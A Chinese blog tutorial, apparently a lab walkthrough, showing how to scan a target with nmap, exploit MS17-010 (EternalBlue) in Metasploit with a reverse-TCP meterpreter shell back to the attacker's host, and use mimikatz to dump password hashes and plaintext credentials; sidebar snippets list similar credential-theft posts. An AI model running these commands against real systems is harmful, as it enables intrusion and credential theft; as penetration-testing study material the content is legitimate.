详解利用ms17-010配合mimikatz获取目标主机账户密码

最新推荐文章于 2024-03-26 16:25:08 发布
最新推荐文章于 2024-03-26 16:25:08 发布
阅读量2.2k 收藏 7
点赞数
分类专栏: mimikatz
原文链接:https://blog.csdn.net/qq_43573676/article/details/91355049
版权

第一步:使用Nmap扫描目标主机开放端口
要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描

nmap 192.168.48.110

第二步:获取权限

在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。
运行msf,使用ms17010漏洞。

msf5 > use exploit/windows/smb/ms17_010_eternalblue 



接下来show options查看需要配置的参数

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 


剩下的就是需要我们设置LHOST、RHOST、payload,分别是攻击机IP、靶机IP、攻击载荷。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1  //攻击机ip
lhost => 192.168.48.1
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.48.110  //靶机ip
rhost => 192.168.48.110
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //攻击载荷
payload => windows/x64/meterpreter/reverse_tcp


一切配置完毕后开始攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

这里可以看到我们已经攻击成功了,拿到了靶机的shell。

拿到权限后先不要着急干别的,这里我们最好先进行进程迁移,确保我们的msf程序在目标机上不会受到干扰

先使用ps命令查看进程

meterpreter > ps


因为我们是64位操作系统,所以我们选择迁移到64位的进程上。

meterpreter > migrate 516  //这里的516是PID,就是进程ID

第三步:使用mimikatz模块获取目标机明文密码

使用mimikatz模块

meterpreter > load mimikatz

获取靶机密码哈希

meterpreter > msv


获取靶机明文密码

meterpreter > kerberos 


到这里攻击就结束了,成功拿到了目标机的明文账户密码。

注:本文仅供参考学习,请勿在网上搞破坏,触犯法律者应承担相应的法律责任!
 

TYW----子曰小玖
关注
专栏目录
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4542
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
耗时3个月 暗访40+安全大牛 终于总结了2023各安全大厂面经(包含护网红蓝队面试题)
MachineGunJoe666
06-14 1337
这里的套路指的不是所谓的出题套路,而是涉及的技术栈,都是大同小益的,无非就是那么几样,java,域为主体,其他为辅助。虽然技术栈不变,但是面试的问题每一年都会略有改变,因为安全技术在进步,每一年面试问的东西,或多或少都会和当年出来的新技术有关系,而目前更多的会涉及到云这一块。所以搞安全,一定要与时俱进。市场要求,本质上还是底线要求,他要求你能够胜任当前岗位,这个要求已经很基本了。对自己的要求应该还需要拔高,更多的应该是因为兴趣就某个问题进行深入钻研,然后完成各种各样的挑战,这样玩下来才更有乐趣。
【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 2320
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
详解新手如何利用ms17-010配合mimikatz获取目标主机账户密码
1匹黑马
06-09 1944
第一步:使用Nmap扫描目标主机开放端口 要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描 nmap 192.168.48.110 第二步:获取权限 在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。 运行msf,使用ms17010漏洞。 msf5 > use exploit/windows/smb/ms17_010_eternalblue ...
Mimikatz介绍
最新发布
#7的博客
03-26 1812
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
mimikatz
s0mor
09-10 683
mimikatz已集成到metasploit中 需要SYSTEM权限 查看权限: getuid 若不是SYSTEM权限: getsystem 载入mimikatz load mimikatz密码 mimikatz_command -f samdump::hashes MD5解密就行了 ...
详解Windows渗透测试工具Mimikatz的内核驱动
weixin_60043341的博客
08-17 1226
Mimikatz通过其中包含的Mimidrv驱动程序,提供了利用内核模式的功能。Mimidrv是已经签名的Windows驱动模型(WDM)内核模式软件驱动程序,在相关命令前加上感叹号(!)即可与标准Mimikatz可执行文件共同使用。Mimidrv没有相应文档,并且很少被人使用,但它却提供了一个非常值得关注的方式,让我们可以在ring 0执行一些操作。本文详细分析Mimidrv提供的功能,提出了一些可供大家参考的文档,同时向不太了解内核的读者介绍一些核心概念,最后将提出用于缓解基于驱动的威胁的防范建议。..
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4846
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
网络安全B模块(笔记详解)- Windows操作系统渗透测试
weixin_57536426的博客
12-24 1001
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3907
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
密码安全攻防技术精讲
GitChat
07-03 3079
课程介绍 本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。 非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击,从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限,密码攻防涉及的技术非常...
mimikatz的使用
谢公子的博客
07-26 3619
mimikatz mimikatz是法国人Gentil Kiwi 编写的一款 Windows 平台下的神器,它具备很多功能,其中最主要的功能是直接从lsass.exe进程里获取处于 active 状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://blog....
永恒之蓝 ms17_010_eternalblue
qq_41326328的博客
07-02 438
恶意代码会扫描开放共享端口的windows机器,无需用户任何 永恒之蓝是会扫描开放445端口文件共享端口的windows机器,无需用户任何操作,只要开机上网。 会感染windowsxp windows2000 windows2003 windowsvista mac os 系统等 1.实验环境:kali-linux windows7旗舰版 2.IP地址 kali:192.168.1...
MSF之ms17-010永恒之蓝漏洞利用
热门推荐
极光时流
11-26 1万+
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali系统,其IP为:192.168.207.130 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole use auxiliary/scanner/smb/s...
mimikatz实战域渗透抓取域控管理员密码
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
ms17010漏洞利用主机漏洞利用
qq_38989921的博客
03-22 3632
攻击机:kali ip:192.168.248.129 靶机:win7 x64 enterprise ip: 192.168.248.130 启动msf, Msfconsole search ms 检查msf库里是否存在ms17-010漏洞 Nmap检测靶机开放端口:nmap –sV 192.168.248.130 445端口开放,存在攻击条件 配置exploit 设置目标ip 配置payload: 攻击: msf exploit(ms17_010_eternalblue) > exp
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
授权渗透实践:利用MS14-68漏洞操控内网域控
作者注意到域控未打上KB3011780补丁,因此利用Mimikatz工具(一个强大的Windows安全工具集)和MS14-068漏洞exploit来获取域控的系统信息,包括清除内存中的Kerberos票据。 接下来,作者通过执行`whoami/all`命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值